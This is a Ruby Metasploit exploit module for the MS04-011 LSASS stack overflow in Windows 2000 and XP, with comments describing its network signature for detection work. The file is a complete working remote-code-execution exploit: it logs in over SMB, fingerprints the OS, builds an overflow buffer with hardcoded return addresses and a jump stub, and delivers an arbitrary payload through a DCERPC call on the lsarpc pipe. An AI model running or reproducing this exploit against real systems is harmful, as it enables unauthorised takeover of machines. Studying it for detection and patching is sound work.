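require 'msf/core'

module Msf

# Metasploit exploit module for the MS04-011 LSASS stack overflow (OSVDB 5248).
#
# Wire-level shape of what this module does, useful for building or checking
# detections: an SMB session and login, an open of the '\lsarpc' named pipe, a
# DCERPC bind to 'LSA_DS' and a single DCERPC call to opnum 9 whose argument is
# a several-kilobyte buffer. Hosts that have applied MS04-011 are not affected.
class Exploits::Windows::MS04_011_LSASS < Msf::Exploit::Remote

  #
  # This module exploits a vulnerability in the LSASS service
  #

  include Exploit::Remote::DCERPC
  include Exploit::Remote::SMB

  # Registers the module's metadata with the framework: name, references,
  # payload constraints and the per-OS return addresses used by #exploit.
  #
  # Note that #exploit addresses the targets by position (targets[1] for
  # Windows 2000, targets[2] for Windows XP), so the order of the 'Targets'
  # array below is load-bearing.
  #
  # @param info [Hash] framework-supplied metadata, merged via update_info
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Microsoft LSASS MSO4-011 Overflow',
      'Description'    => %q{ This module exploits a stack overflow in the LSASS service, this vulnerability was originally found by eEye. When re-exploiting a Windows XP system, you will need need to run this module twice. DCERPC request fragmentation can be performed by setting 'FragSize' parameter. },
      'Author'         => [ 'hdm' ],
      'Version'        => '$Revision$',
      'References'     =>
        [
          [ 'OSVDB', '5248' ],
          [ 'MSB', 'MS04-011' ],
          [ 'MIL', '36' ],
        ],
      'Privileged'     => true,
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread'
        },
      'Payload'        =>
        {
          'Space'    => 1024,
          # NUL, LF, CR, backslash, underscore, slash and dot must not appear
          # in the encoded payload.
          'BadChars' => "\x00\x0a\x0d\x5c\x5f\x2f\x2e",
          # x86: add esp, -0x1001 ; inc esp  -> net esp -= 0x1000 before the
          # payload runs (presumably to move the stack pointer off the buffer).
          'Prepend'  => "\x81\xc4\xff\xef\xff\xff\x44",
        },
      'Targets'        =>
        [
          # Automatic -- no return address; #exploit picks a target from the
          # peer's reported OS string instead.
          [
            'Automatic Targetting',
            {
              'Platform' => 'win',
              'Rets'     => [ ],
            },
          ],
          # Windows 2000
          [
            'Windows 2000 English',
            {
              'Platform' => 'win',
              'Rets'     => [ 0x773242e0 ],
            },
          ],
          # Windows XP
          [
            'Windows XP English',
            {
              'Platform' => 'win',
              'Rets'     => [ 0x7449bf1a ],
            },
          ],
        ],
      'DefaultTarget' => 0))
  end

  # Connects over SMB, fingerprints the peer OS, builds the OS-specific
  # overflow buffer and delivers it as a DCERPC call on the \lsarpc pipe.
  #
  # Fix: the final arm of the OS `case` was written as
  # `when print_status("No target ...")`, i.e. the status call was the *when
  # condition*. For an unrecognised, non-nil OS string the message was printed
  # but `return` only ran if print_status's result matched `os`, so the
  # empty `over` buffer was still bound and sent to opnum 9. It is now a real
  # `else` branch and the method returns before touching the pipe.
  #
  # @return [void]
  def exploit

    #
    # Connect to the remote SMB service
    #
    print_status("Connecting to the target system...")
    connect

    #
    # Request a session, authenticate, and connect to IPC$
    #
    smb_login

    #
    # Check the remote OS name and version
    #
    os   = smb_peer_lm
    over = ''

    case os

      # Windows 2000 requires that the string be unicode formatted
      # and give us a nice set of registers which point back to
      # the un-unicoded data. We simply return to a nop sled that
      # jumps over the return address, some trash, and into the
      # final payload. Easy as pie.
      when /2000/
        str = Rex::Text.rand_text_alphanumeric(3500)
        # Return address at offset 2020, payload at 2104; with 'Space' => 1024
        # the payload ends no later than offset 3128, inside the 3500 bytes.
        str[2020, 4] = [targets[1]['Rets'][0]].pack('V')
        str[2104, payload.encoded.length ] = payload.encoded
        # self.unicode is provided by a mixin; assumed to widen the string
        # to UTF-16LE -- confirm against the SMB/DCERPC mixins.
        over = self.make_lsass_stub_beg + self.unicode(str) + make_lsass_stub_end

      # Windows XP is a bit different, we need to use an ascii
      # buffer and a jmp esp. The esp register points to an
      # eight byte segment at the end of our buffer in memory,
      # we make these bytes jump back to the beginning of the
      # buffer, giving us about 1936 bytes of space for a
      # payload.
      when /XP/
        str = Rex::Text.rand_text_alphanumeric(7000)
        str[0, payload.encoded.length ] = payload.encoded
        str[1964, 4] = [targets[2]['Rets'][0]].pack('V')
        # E9 rel32 with rel32 = 0xfffff83f (-1985): from the instruction end at
        # offset 1985 this lands on offset 0, the start of the payload.
        str[1980, 5] = "\xe9\x3f\xf8\xff\xff" # jmp back to payload
        over = self.make_lsass_stub_beg + str + make_lsass_stub_end

      # Unknown OS: report and stop rather than sending an empty request.
      else
        print_status("No target is available for #{ os }")
        return
    end

    #
    # Open the lsarpc named pipe
    #
    fid = smb_create('\lsarpc')

    #
    # Bind to LSASS over the LSARPC pipe
    #
    smb_dcerpc_bind(fid, 'LSA_DS')

    #
    # Send the malicious DCERPC request
    #
    smb_dcerpc_call(fid, 9, over)

    #
    # Perform any required client-side payload handling
    #
    handler
  end

  # Fixed 12-byte prefix placed before the overflow string in the request
  # body. Its encoding is not decoded here; it is the same for both targets.
  #
  # @return [String] binary prefix
  def make_lsass_stub_beg
    "\xad\x0d\x00\x00\x00\x00\x00\x00\xad\x0d\x00\x00"
  end

  # Fixed trailer placed after the overflow string in the request body. The
  # bytes are reproduced verbatim from the original module; their structure
  # is not decoded here, and the same trailer is used for both targets.
  #
  # @return [String] binary trailer
  def make_lsass_stub_end
    "\x00\x00\x00\x00\x50\x6a\x40\x00\x01\x00\x00\x00" +
    "\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00" +
    "\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00" +
    "\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00" +
    "\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x50\x6a\x40\x00" +
    "\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00" +
    "\x50\x6a\x40\x00\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00" +
    "\x00\x00\x00\x00\x50\x6a\x40\x00\x01\x00\x00\x00\x00\x00\x00\x00" +
    "\x01\x00\x00\x00\x00\x00\x00\x00\x50\x80\x23\x00\xdf\xaf\xff\x33" +
    "\x9b\x78\x70\x43\xc5\x0a\x4d\x98\x96\x02\x64\x92\xc1\xee\x70\x32" +
    "\x65\xc1\xef\x7b\xd6\xaa\xd6\x09\x21\xf6\xe7\xd1\x4c\xdf\x6a\x2d" +
    "\x0a\xfb\x43\xea\xda\x07\x24\x84\x88\x52\x9e\xa8\xa1\x7f\x4b\x60" +
    "\xec\x94\x57\x33\x06\x93\x92\x25\xd6\xac\xdc\x89\x68\x5e\xbb\x32" +
    "\x2b\x17\x68\xf2\x06\xb7\x86\xac\x81\xfe\x52\x27\xf5\x80\x11\x0d" +
    "\x4e\x2e\x1b\xa3\x44\x8a\x58\xed\xf3\x9c\xe9\x31\x01\x72\xa6\xab" +
    "\xfa\xa8\x05\x00\x37\x60\x6b\x81\xef\xf4\x96\x9a\xf7\x67\x95\x27" +
    "\x7a\x25\xef\x6f\x0e\xff\x2d\x15\x7f\x23\x1c\xa7\x56\x94\x4a\x18" +
    "\x98\xc6\xd8\xd2\x29\x5b\x57\xb8\x5d\x3a\x93\x58\x45\x77\x36\xe3" +
    "\xd1\x36\x87\xff\xe3\x94\x0f\x00\xe6\x7c\x1a\x92\xc1\x5f\x40\xc3" +
    "\xa3\x25\xce\xd4\xaf\x39\xeb\x17\xcf\x22\x43\xd9\x0c\xce\x37\x86" +
    "\x46\x54\xd6\xce\x00\x30\x36\xae\xf9\xb5\x2b\x11\xa0\xfe\xa3\x4b" +
    "\x2e\x05\xbe\x54\xa9\xd8\xa5\x76\x83\x5b\x63\x01\x1c\xd4\x56\x72" +
    "\xcd\xdc\x4a\x1d\x77\xda\x8a\x9e\xba\xcb\x6c\xe8\x19\x5d\x68\xef" +
    "\x8e\xbc\x6a\x05\x53\x0b\xc7\xc5\x96\x84\x04\xd9\xda\x4c\x42\x31" +
    "\xd9\xbd\x99\x06\xf7\xa3\x0a\x19\x49\x07\x77\xf0\xdb\x7c\x43\xfa" +
    "\xb2\xad\xb0\xfa\x87\x52\xba\xc9\x94\x61\xdc\xcf\x16\xac\x0f\x4a" +
    "\xa3\x6b\x5b\x6e\x27\x86\x1f\xfe\x4d\x28\x3a\xa5\x10\x54\x6d\xed" +
    "\x53\xf9\x73\xc6\x6e\xa8\xc0\x97\xcf\x56\x3b\x61\xdf\xab\x83\x18" +
    "\xe8\x09\xee\x6a\xb7\xf5\xc9\x62\x55\x2d\xc7\x0c\x0d\xa0\x22\xd8" +
    "\xd4\xd6\xb2\x12\x21\xd7\x73\x3e\x41\xb0\x5c\xd4\xcf\x98\xf3\x70" +
    "\xe6\x08\xe6\x2a\x4f\x24\x85\xe8\x74\xa8\x41\x5f\x0e\xfd\xf1\xf3" +
    "\xbe\x9b\x14\xfd\xc0\x73\x11\xff\xa5\x5b\x06\x34\xc3\x6c\x28\x42" +
    "\x07\xfe\x8a\xa5\xbe\x72\x7a\xf7\xfa\x25\xec\x35\x5e\x98\x71\x50" +
    "\x60\x35\x76\x53\x40\x1a\x34\xa5\x99\x09\xa2\xc6\xca\xa5\xce\x08" +
    "\x50\x45\xab\x8d\xfb\xe3\xb8\xe4\x8a\x61\x48\x14\x6e\xf7\x58\x71" +
    "\xe5\x2e\xbc\x12\xd1\x25\xe9\x65\x7a\xa1\x27\xbe\x3b\x8b\xe8\xe7" +
    "\xbc\xe1\x05\xe7\x92\xeb\xb9\xdf\x5d\x53\x74\xc0\x63\x97\x80\xb8" +
    "\x3c\xae\xf3\xf2\x09\x12\x81\x6c\x69\x10\x6f\xf6\xbe\x03\x7b\x88" +
    "\xcf\x26\x6b\x51\x06\x23\x68\x03\xa1\xb7\xd3\x0c\xca\xbf\x29\x01" +
    "\xa9\x61\x34\x75\x98\x1e\x05\x59\xb3\x46\x44\xff\x2b\x98\x04\x88" +
    "\x89\xfd\x7f\xd5\x19\x8a\xa6\xf3\xd9\x44\xd5\xf9\x3a\x3c\xec\xd9" +
    "\x9b\x8c\x93\x93\x2b\x44\x86\x8b\x80\x83\x23\x00\xdf\xaf\xff\x33" +
    "\x9b\x78\x70\x43\xf1\x55\x87\xb1\xa1\xb3\x8e\x79\x02\x70\x82\x6c" +
    "\x0b\xc1\xef\x96\xf1\xef\xdd\xa2\x69\x86\xc7\x85\x09\x7e\xf0\x2f" +
    "\x8e\xa0\x5f\xea\x39\x2e\x24\xf0\x82\x30\x26\xa8\xa1\x4f\xc6\x5c" +
    "\xec\x94\x87\x52\x9b\x93\x92\xf3\xa3\x1b\xc7\x8f\x9e\xb3\xbb\x32" +
    "\x2b\x17\x54\xf2\x06\x0c\x86\x92\x0f\xb8\xe0\x27\x50\xaa\xeb\xf5" +
    "\x4e\x2b\x1b\xb2\x44\xe6\x58\x02\xd7\x65\xdc\x31\x01\xec\xa6\xab" +
    "\xfa\xa8\x05\x00\x37\x60\x4f\xa1\x3c\x4f\x7a\x9a\x10\x67\x95\xc2" +
    "\x5b\x25\xef\x76\x0e\xff\x2d\x15\x7f\x23\x1c\x77\x56\x94\x4a\x18" +
    "\x98\xc6\xd8\xd2\x29\x44\x57\xb8\x40\x3a\x93\x58\x45\x77\x36\x36" +
    "\x07\x35\x2a\xff\x00\x94\x5c\x80\xe6\x7c\x1a\x92\xc1\x5f\x40\xc3" +
    "\xbc\xf8\xce\x05\x77\x39\x40\x17\xcf\x63\x43\x77\x27\xce\x37\x86" +
    "\x46\x54\xd6\xce\x00\x30\x36\xae\x9f\x24\x2b\x5a\xa0\xfe\xa3\x4b" +
    "\x2e\x7e\xf7\x54\xa9\xd8\xa5\x76\x83\x7b\x63\x01\x1c\xd4\x56\x17" +
    "\x02\xdc\x4a\x89\x77\xda\x8f\x9e\xba\xcb\x37\xe8\x19\x5d\x68\x38" +
    "\x8e\xbc\x6a\x05\x53\x0b\xc7\xc5\x96\x84\x5a\xd9\x6d\x4c\x42\x31" +
    "\xd9\xf2\x99\x06\xf7\x0c\x99\xbe\x49\x07\x77\xf0\x8b\x7c\x43\xfa" +
    "\xb2\xad\xb0\xfa\x87\x52\xba\xc9\x94\x61\xdc\xcf\x16\xac\x0f\x4a" +
    "\xa3\x6b\x5b\x6e\x27\x86\x1f\xfe\x4d\x28\x3a\xa5\x10\x98\x6d\xed" +
    "\x53\xf9\x73\xc6\xa5\xa8\xf7\x66\xcf\x56\x3b\x61\xdf\xab\x83\x18" +
    "\xe8\x09\xee\x6a\xb7\xf5\xc9\x62\x55\x2d\xc7\x0c\x0d\xa0\x22\xd8" +
    "\xd4\xd6\xb2\x12\x21\xd7\x73\x3e\x41\xb0\x5c\xd4\xcf\x98\xf3\x70" +
    "\xe6\x08\xe6\x2a\x4f\x92\x85\xe8\x74\xa8\x41\x5f\x0e\xfd\xf1\xf3" +
    "\xbe\x9b\x14\xfd\xc0\x73\x11\xff\xa5\x5b\x06\x34\xc3\x5d\x28\x42" +
    "\x34\xfe\x8a\xa5\xbe\x72\x7a\xf7\xfa\x25\x2b\x35\x5e\x98\x71\x50" +
    "\x2c\x35\x76\x53\x4e\x1a\x34\xa5\x99\x09\xa2\xc6\xca\xa5\xce\x08" +
    "\x50\x45\xab\x8d\xfb\xe3\xb8\xe4\x8a\x61\x48\x14\x6e\xf7\x58\x71" +
    "\xe5\x2e\xbc\x12\xd1\x25\xe9\x65\x7a\xa1\x27\xbe\x3b\x8b\xe8\xe7" +
    "\xbc\x77\x05\xe7\x92\xeb\xb9\xdf\x5d\x53\x74\xc0\x63\x97\x80\xb8" +
    "\x3c\xae\xf3\xf2\x09\x12\x81\x6c\x69\x10\x6f\xf6\xbe\x03\x7b\x88" +
    "\xcf\x26\x6b\x51\x06\x23\x68\x03\xa1\xb7\xd3\x0c\xca\xbf\x29\x01" +
    "\xa9\x61\x34\x75\x98\x1e\x6f\x59\xb3\x46\x44\xff\x2b\x98\x04\x88" +
    "\x89\xfd\x1c\xd5\x19\x8a\xa6\xf3\xd9\x44\xd5\xf9\x79\x26\x46\xf7" +
    "\xbf\xa1\x12\x73\x23\x44\x86\x8b\x50\x6a\x40\x00"
  end

end
end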